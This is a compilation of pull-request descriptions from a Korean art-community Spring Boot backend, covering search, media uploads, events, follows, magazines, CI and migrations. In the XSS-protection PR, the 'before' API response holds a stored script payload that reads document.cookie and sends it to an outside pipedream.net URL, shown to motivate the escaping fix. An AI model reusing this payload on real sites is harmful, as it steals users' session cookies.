Media-XI/artscope-backend

src/main/java/com/example/codebase/domain/artwork/dto/ArtworkWithIsLikeResponseDTO.java

[PR] 리팩터링 ArtworkWithIsLikeResponseDTO isLike 변수명 변경

---

.github/workflows/prod-build.yml
.github/workflows/test.yaml

- Main 브랜치 CI Push일때만 적용
- Test는 Main, Develop PR 요청시 실행
해당 PR은 Main 브랜치에 PR 요청 발생 시 Test 검사가 이뤄지고 Build 까지 되는 비용이 큰 작업이 실행되어서 
PR 요청 시 Test 만 진행하도록 트리거 조건을 변경하였습니다.

[PR] Docker Production CI 트리거 변경

---

src/main/java/com/example/codebase/controller/PostController.java
src/main/java/com/example/codebase/controller/SearchController.java
src/main/java/com/example/codebase/domain/artwork/entity/ArtworkMedia.java
src/main/java/com/example/codebase/domain/artwork/repository/ArtworkRepository.java
src/main/java/com/example/codebase/domain/artwork/service/ArtworkService.java
src/main/java/com/example/codebase/domain/exhibition/entity/ExhibitionMedia.java
src/main/java/com/example/codebase/domain/exhibition/entity/ExhibtionMediaType.java
src/main/java/com/example/codebase/domain/feed/dto/FeedType.java
src/main/java/com/example/codebase/domain/image/service/ImageService.java
src/main/java/com/example/codebase/domain/media/MediaType.java
src/main/java/com/example/codebase/domain/member/entity/ArtistStatus.java
src/main/java/com/example/codebase/domain/post/dto/PostCreateDTO.java
src/main/java/com/example/codebase/domain/post/dto/PostMediaCreateDTO.java
src/main/java/com/example/codebase/domain/post/dto/PostMediaResponseDTO.java
src/main/java/com/example/codebase/domain/post/dto/PostResponseDTO.java
src/main/java/com/example/codebase/domain/post/entity/Post.java
src/main/java/com/example/codebase/domain/post/entity/PostMedia.java
src/main/java/com/example/codebase/domain/post/repository/PostRepository.java
src/main/java/com/example/codebase/domain/post/service/PostService.java
src/main/java/com/example/codebase/domain/search/SearchService.java
src/main/java/com/example/codebase/domain/search/dto/SearchResponseDTO.java
src/main/java/com/example/codebase/s3/S3Service.java
src/main/resources/db/migration/V44__create_post_media_table.sql
src/test/java/com/example/codebase/controller/ArtworkControllerTest.java
src/test/java/com/example/codebase/controller/ExhibitionControllerTest.java
src/test/java/com/example/codebase/controller/FeedControllerTest.java
src/test/java/com/example/codebase/controller/PostControllerTest.java
src/test/java/com/example/codebase/controller/SearchControllerTest.java

- 통합 검색 API 추가되었습니다
추후 검색엔진을 사용, 확장을 고려해 Search 도메인을 생성했고.
통합 검색 로직을 해당 도메인에서 구현했습니다. 
- PostMedia 업로드 기능이 추가됬습니다
기존 Post 생성 API에 미디어 파일을 함께 첨부할 수 있습니다
Post 응답 DTO에 Media 관련 인스턴스를 추가했습니다. API 응답 시 미디어가 첨부된 Post를 볼 수 있습니다.

[PR] Feat/통합검색 포스트미디어 기능

---

src/main/java/com/example/codebase/controller/PostController.java
src/main/java/com/example/codebase/controller/SearchController.java
src/test/java/com/example/codebase/controller/PostControllerTest.java

해당 PR 직전의 커밋 내용을 테스트 시 통과가 되지 않아 강제 push 한 커밋을 revert 했는데 해당 이슈를 해결해서 revert 전 커밋 내용을 적용했습니다

fix: Post 생성 Media Size 체크 시 NPE 해결

---

build.gradle
src/main/java/com/example/codebase/config/SecurityConfig.java
src/main/java/com/example/codebase/config/WebMvcConfig.java
src/main/java/com/example/codebase/util/HTMLCharacterEscapes.java

Jackson ObjectMapper 기능 확장을 이용한 XSS 취약점 방지 기능 추가
- HTML 이스케이프 문자를 대체하는 모듈 추가
- Jackson LocalDateTime 역직렬화 호환을 위한 의존성 추가 및 ObjectMapper 모듈 적용
개선 전 - API 응답 내용
```java
{
"id": 58,
"content": "<strong>hi</strong>\n<script>\nalert(document.cookie);\nlocation.href=\"https://eov9xxmtq9jcsi6.m.pipedream.net/memo?memo=hello\"+document.cookie;</script>",
"views": 1,
"likes": 0,
"comments": 0,
"isLiked": false,
"authorUsername": "jadra",
"authorName": "jadra",
"authorDescription": "ㅇㅇss",
"authorProfileImageUrl": "dev/2023-10-23/6aa71471-b0a8-457d-8a7f-7ebd0fc3198b.jpg",
"createdTime": "2023-11-01T18:27:17",
"updatedTime": "2023-11-01T18:51:52",
"commentPosts": [],
"medias": [],
"likeMembers": []
}
```
개선 이후 - 동일 API 응답 내용
```java
{
"id": 9,
"content": …
```

[PR] Feat/xss protection

---

src/main/java/com/example/codebase/domain/member/dto/MemberResponseDTO.java
src/main/java/com/example/codebase/domain/member/entity/Member.java

[PR] Fix/member dto optional serialize

---

src/main/java/com/example/codebase/controller/LocationController.java
src/main/java/com/example/codebase/domain/location/service/LocationService.java
src/test/java/com/example/codebase/controller/LocationControllerTest.java

- location api가 locations-> location으로 변경되었습니다.
- 장소 조회를 구현했습니다.

Feat/location 조회

---

src/main/java/com/example/codebase/controller/ExhibitionController.java
src/main/java/com/example/codebase/controller/MemberController.java
src/main/java/com/example/codebase/domain/exhibition/dto/ExhibitionSearchDTO.java
src/main/java/com/example/codebase/domain/exhibition/dto/ParticipantInformationResponseDTO.java
src/main/java/com/example/codebase/domain/exhibition/entity/ExhibitionParticipant.java
src/main/java/com/example/codebase/domain/exhibition/service/ExhibitionService.java
src/main/java/com/example/codebase/domain/member/dto/MemberSearchResponseDTO.java
src/main/java/com/example/codebase/domain/member/repository/MemberRepository.java
src/main/java/com/example/codebase/domain/member/service/MemberService.java
src/main/resources/db/migration/V202311070926__add_name_to_event_participant.sql
src/test/java/com/example/codebase/controller/ExhibitionControllerTest.java
src/test/java/com/example/codebase/controller/MemberControllerTest.java

- 이제 스케줄에 참석자를 추가할때 회원이 아닌 유저도 추가할수 있게 수정하였습니다.
- 스케줄 참석자를 찾기위해 유저를 검색할수 있는 api가 추가되었습니다.
- 이벤트 전체 조회 api가 api/exhibtions body->query parameter로 변경되었습니다.

[PR] Feat/스케줄 참석자 관련 기능추가

---

src/main/java/com/example/codebase/domain/member/dto/MemberSearchResponseDTO.java
src/main/java/com/example/codebase/domain/member/service/MemberService.java
src/test/java/com/example/codebase/controller/MemberControllerTest.java

- member를 반환할때 정보 항목들 추가
- username과 email로 검색하면 제대로 조회가 안되던 문제 해결

[PR] Fix/member list 조회 문제해결

---

src/main/java/com/example/codebase/domain/exhibition/entity/EventType.java
src/main/java/com/example/codebase/domain/exhibition/repository/ExhibitionRepository.java
src/main/java/com/example/codebase/domain/exhibition/service/ExhibitionService.java
src/test/java/com/example/codebase/controller/ExhibitionControllerTest.java

- exhibition을 조회할때 eventSchedule 여러개가 조회되던 문제 해결

[PR] Fix/이벤트검색 문제해결

---

src/main/java/com/example/codebase/controller/AgoraController.java
src/main/java/com/example/codebase/domain/agora/dto/AgoraDetailReponseDTO.java
src/main/java/com/example/codebase/domain/agora/dto/AgoraOpinionResponseDTO.java
src/main/java/com/example/codebase/domain/agora/dto/AgoraResponseDTO.java
src/main/java/com/example/codebase/domain/agora/entity/AgoraOpinion.java
src/main/java/com/example/codebase/domain/agora/entity/AgoraParticipant.java
src/main/java/com/example/codebase/domain/agora/service/AgoraService.java
src/main/java/com/example/codebase/domain/feed/dto/FeedItemResponseDto.java
src/main/java/com/example/codebase/domain/feed/dto/FeedType.java
src/main/java/com/example/codebase/domain/feed/service/FeedService.java
src/test/java/com/example/codebase/controller/AgoraControllerTest.java
src/test/java/com/example/codebase/controller/FeedControllerTest.java

- Agora, AgoraOpinion 사용자 작성자 여부, 투표 여부 표시
- Feed에 Agora 조회 추가

ARTDEV-36-Agora-feed-add (Agora 사용자의 투표 여부 표시)

---

.github/workflows/dev-build.yml
.github/workflows/prod-build.yml

- Gradle 빌드 시 Test 가 포함되어 있습니다 빌드 시간이 이로인해 증가하므로  작업을 삭제하였습니다.

chore: Action Build 프로세스 test task 삭제

---

build.gradle
src/main/java/com/example/codebase/config/SecurityConfig.java
src/main/java/com/example/codebase/controller/AgoraController.java
src/main/java/com/example/codebase/controller/MemberController.java
src/main/java/com/example/codebase/controller/advice/CustomExceptionHandler.java
src/main/java/com/example/codebase/domain/agora/dto/AgoraCreateDTO.java
src/main/java/com/example/codebase/domain/agora/service/AgoraService.java
src/main/java/com/example/codebase/domain/member/entity/Member.java
src/test/java/com/example/codebase/controller/AgoraControllerTest.java

Hibernate core 6.1.X 에서 복합키 UUID 관련 리플렉션 에러가 발생해 Spring Boot를 업그레이드하여 해당 이슈를 해결했습니다.
해당 이슈에 대한 관련 [spring data jpa issue](https://github.com/spring-projects/spring-data-jpa/issues/2552)

Fix/member UUID issue

---

src/main/java/com/example/codebase/domain/exhibition/dto/EventScheduleCreateDTO.java
src/main/java/com/example/codebase/domain/exhibition/dto/EventScheduleResponseDTO.java
src/main/java/com/example/codebase/domain/exhibition/dto/ExhibitionSearchDTO.java
src/main/java/com/example/codebase/domain/exhibition/dto/ParticipantInformationDTO.java
src/main/java/com/example/codebase/domain/exhibition/entity/EventSchedule.java
src/main/java/com/example/codebase/domain/exhibition/repository/EventScheduleRepository.java
src/main/java/com/example/codebase/domain/exhibition/repository/ExhibitionRepository.java
src/main/java/com/example/codebase/domain/feed/dto/FeedItemEventResponseDto.java
src/main/java/com/example/codebase/domain/feed/dto/FeedItemResponseDto.java
src/main/resources/db/migration/V202311201124__drop_event_date_column_to_event_schedule.sql
src/main/resources/db/migration/V202311201150_modify_endTime_null_to_event_schedule_table.sql
src/test/java/com/example/codebase/controller/ExhibitionControllerTest.java
src/test/java/com/example/codebase/controller/FeedControllerTest.java

- EventScedule의 EventDate가 제거 되었습니다.
- 이제 startTime과 endTime으로 시작시간과 종료시간을 구분합니다.
- 끝나는 시간을 모른다면 endTime을 null로 설정할수 있습니다.

[PR] Refector/exhibition time

---

src/main/resources/db/migration/V202311201100__change_event_schedule_time_to_date_time.sql
src/main/resources/db/migration/V202311201101__update_event_schedule_time_to_date_time.sql
src/main/resources/db/migration/V202311201124__drop_event_date_column_to_event_schedule.sql
src/main/resources/db/migration/V202311201150__modify_endTime_null_to_event_schedule_table.sql
src/main/resources/db/migration/V202311201746__modify_start_date_end_date_to_event_schedule_table.sql

- 1. time -> dateTime 변경 작업 추가
- 2. 변경된 dateTime에 date 추가하는 작업
- 3. event_date 사용하지 않으므로 drop을 위한 과정 작업

[PR] fix: Drop Event Date Column 작업을 위한 SQL 변경 및 추가

---

src/main/java/com/example/codebase/controller/ExhibitionController.java
src/main/java/com/example/codebase/domain/exhibition/dto/ExhibitionSearchDTO.java
src/main/java/com/example/codebase/domain/exhibition/service/ExhibitionService.java

- ExhibitionSearchDTO에 null이 들어올경우 조회가 안되던 문제를 해결했습니다

fix: ExhibitionSearchDTO이 null이 들어올경우 조회가 안되던 문제 해결.

---

src/main/java/com/example/codebase/domain/exhibition/dto/EventScheduleCreateDTO.java
src/main/java/com/example/codebase/domain/exhibition/dto/ExhbitionCreateDTO.java

- EventSchedule이 제대로 만들어 지지 않던 문제 해결 했습니다.

fix: EventSchedule이 제대로 만들어 지지 않던 문제 해결

---

src/main/java/com/example/codebase/controller/MemberController.java
src/main/java/com/example/codebase/domain/member/dto/MembersResponseDTO.java
src/main/java/com/example/codebase/domain/member/entity/Member.java
src/main/java/com/example/codebase/domain/member/entity/RoleStatus.java
src/main/java/com/example/codebase/domain/member/repository/MemberRepository.java
src/main/java/com/example/codebase/domain/member/service/MemberService.java
src/test/java/com/example/codebase/controller/MemberControllerTest.java

- 회원 전체 조회 페이지네이션
- 역활 상태 변경 API 로직 변경
- 잘못된 API docs 수정

Feat/member 조회 관련 api

---

src/main/java/com/example/codebase/domain/exhibition/dto/EventScheduleCreateDTO.java
src/test/java/com/example/codebase/controller/ExhibitionControllerTest.java

- event Schedule 생성시간이 종료시간보다 늦을 경우 예외처리를 추가했습니다.

feat: event schedule 생성시간이 종료시간보다 늦을경우 예외처리

---

src/main/resources/db/migration/V202312081539__add_allow_email_receive_column_to_member.sql

ARTDEV-98-be-migration-v-202312081539-add-allow-email-receive-column-to-member-sql-failed-해결

---

src/main/java/com/example/codebase/controller/ExhibitionController.java
src/main/java/com/example/codebase/domain/exhibition/service/ExhibitionService.java

- 이벤트 일정 삭제시 최소 1개 이상인지 확인하는 조건 추가했습니다.

 ARTDEV-108-be-index-0-out-of-bounds-for-length-0 해결

---

src/main/java/com/example/codebase/controller/MailController.java
src/main/java/com/example/codebase/domain/mail/service/MailService.java

feat: 아이디 찾기 시 OAuth 예외처리

---

src/main/java/com/example/codebase/controller/EventController.java
src/main/java/com/example/codebase/controller/LocationController.java
src/main/java/com/example/codebase/domain/event/crawling/service/EventDetailCrawlingService.java
src/main/java/com/example/codebase/domain/event/dto/EventSearchDTO.java
src/main/java/com/example/codebase/domain/event/entity/Event.java
src/main/java/com/example/codebase/domain/event/repository/EventRepository.java
src/main/java/com/example/codebase/domain/event/service/EventService.java
src/main/java/com/example/codebase/domain/location/dto/LocationCreateDTO.java
src/main/java/com/example/codebase/domain/location/dto/LocationResponseDTO.java
src/main/java/com/example/codebase/domain/location/dto/LocationUpdateDTO.java
src/main/java/com/example/codebase/domain/location/entity/Location.java
src/main/java/com/example/codebase/domain/location/repository/LocationRepository.java
src/main/java/com/example/codebase/domain/location/service/LocationService.java
src/main/resources/db/migration/V202401111245___add_user_name_to_location.sql
src/main/resources/db/migration/V202401132041__modify_startdate_to_event.sql
src/test/java/com/example/codebase/controller/EventControllerTest.java
src/test/java/com/example/codebase/controller/LocationControllerTest.java

- location table에 생성자, 생성일, 수정일이 추가되었습니다.
- 생성자와 관리자는 location을 수정 및 삭제할 수 있게 추가했습니다.
- location을 상세 조회할 때 작성자 정보를 반환하도록 추가했습니다.
- event에 관하여 username(작성자)으로 찾을 수 있도록 추가했습니다.
- location에 관하여 username(작성자)으로 찾을 수 있도록 추가했습니다.

feat/location 추가 문제 해결

---

src/main/java/com/example/codebase/controller/FollowController.java
src/main/java/com/example/codebase/domain/follow/entity/Follow.java
src/main/java/com/example/codebase/domain/follow/entity/FollowIds.java
src/main/java/com/example/codebase/domain/follow/repository/FollowRepository.java
src/main/java/com/example/codebase/domain/follow/service/FollowService.java
src/main/resources/db/migration/V202401281030__create_follow_table.sql
src/test/java/com/example/codebase/controller/FollowControllerTest.java

- 팔로우 테이블을 복합키를 사용하여 추가하였습니다.
- 팔로우, 팔로잉 기능을 추가하였습니다

feat: Artdev 138 팔로우 팔로잉 기능 개발

---

src/main/java/com/example/codebase/config/SwaggerConfig.java

- 기본 URL 서버 추가 및 외부 개발, 운영 서버 추가

feat: Swagger Server 추가

---

src/main/java/com/example/codebase/controller/MagazineController.java
src/main/java/com/example/codebase/domain/magazine/dto/MagazineRequest.java
src/main/java/com/example/codebase/domain/magazine/dto/MagazineResponse.java
src/main/java/com/example/codebase/domain/magazine/entity/Magazine.java
src/main/java/com/example/codebase/domain/magazine/entity/MagazineMedia.java
src/main/java/com/example/codebase/domain/magazine/repository/MagazineMediaRepository.java
src/main/java/com/example/codebase/domain/magazine/service/MagazineService.java
src/main/resources/db/migration/V202403011600__create_magazine_media_table.sql
src/test/java/com/example/codebase/controller/MagazineControllerTest.java

- 매거진 생성 API 에 미디어 첨부 기능 구현
- 미디어 DTO 유효성 검증 적용
- 테스트 코드 작성
~~https://github.com/Media-XI/artscope-backend/pull/128 우선적으로 Merge 되어야함~~
- ~~파일 변경이 23개로 나오는데 해당 PR Develop에 머지되고 나면 별로 없음~~
- ~~[1bc3070](https://github.com/Media-XI/artscope-backend/pull/129/commits/1bc30708913acc41fda1a0a9ad62ffbc70c8f722) 커밋부터 차례대로 리뷰~~

 매거진 미디어 업로드 기능 구현

---

src/main/java/com/example/codebase/domain/magazine/service/MagazineService.java

- magazine이 생성시 id가 null이뜨는 문제를 해결했습니다

fix: magazine이 생성시 null이 뜨는 문제를 해결

---

src/main/java/com/example/codebase/controller/AgoraController.java
src/main/java/com/example/codebase/domain/agora/dto/AgoraOpinionRequestDTO.java

- NotBlank 검증을 String이 아닌 Object에 검증으로 인해 검증 실패가 됨

AgoraOpinionRequestDTO @NotBlank 검증으로 인한 오류 해결

---

src/main/java/com/example/codebase/domain/member/entity/Member.java
src/test/java/com/example/codebase/controller/MagazineLikeControllerTest.java
src/test/java/com/example/codebase/controller/NotificationSettingControllerTest.java

- @OnetoOne 옵션에서 optional=false과 fetch = FetchType.LAZY 옵션추가

feat: member를 조회할떄 notification을 조회하는 문제 해결

---

.github/workflows/test.yaml
build.gradle
codecov.yaml

- gradle 플러그인 추가 및 Task 수정
- CodeCov Workflow 적용

feat: Jacoco & CodeCov 적용

---

scripts/migration.sh
src/main/java/com/example/codebase/controller/advice/CustomExceptionHandler.java
src/main/java/com/example/codebase/log/CustomAspectLogging.java
src/main/resources/application-flyway.yml
src/main/resources/log/log4j2-dev.xml
src/main/resources/log/log4j2-local.xml
src/main/resources/log/log4j2-prod.xml

- Flyway 마이그레이션 자동생성 스크립트 추가
프로젝트 루트 경로에 위치하여 다음 스크립트를 실행
```sh
bash ./scripts/migration.sh
```
- 에러 로그가 파일로 남지 않는 이슈 해결
- 컨트롤러 단 모든 예외에 대해 에러 로깅

Flyway 마이그레이션 자동 생성 스크립트 구현 & 에러 로깅 이슈 해결 

---

src/main/java/com/example/codebase/controller/MagazineController.java
src/main/java/com/example/codebase/domain/magazine/repository/MagazineRepository.java
src/main/java/com/example/codebase/domain/magazine/service/MagazineService.java
src/test/java/com/example/codebase/controller/MagazineControllerTest.java

- 사용자가 팔로우 중인 멤버들이 작성한 magazine 목록을 가져오는 api 추가
- **GET** /api/magazines/my/following/members

Artdev 158 be 팔로잉 매거진 리스트 기능

---

.github/workflows/test.yaml
src/main/java/com/example/codebase/aop/AopForTransaction.java
src/main/java/com/example/codebase/exception/LikePostDuplicatedRequestException.java
src/main/resources/db/migration/V202403051151__application.sql
src/test/java/com/example/codebase/controller/PostControllerTest.java

- 매거진 콘텐츠 맨앞에 미디어 URL 첨부하는 SQL 프로시저 스크립트
- 재활용하는 프로시저가 아니므로 실행 후 바로 삭제함

매거진 콘텐츠에 미디어 URL 첨부 프로시저 작성

---

.github/workflows/prod-build.yml
build.gradle
src/main/java/com/example/codebase/util/ClientUtil.java
src/main/resources/application-admin.yaml
src/main/resources/application.yml

- aws ec2 환경을 사용하지 않으므로 codedeploy 관련 action flow 제거
- spring boot admin client 의존성 추가 및 설정 적용
- 실행 환경에 따라 client-url 을 discovery 할 수 있도록 환경변수 적용

[monitoring] spring boot admin, ec2 action flow delete
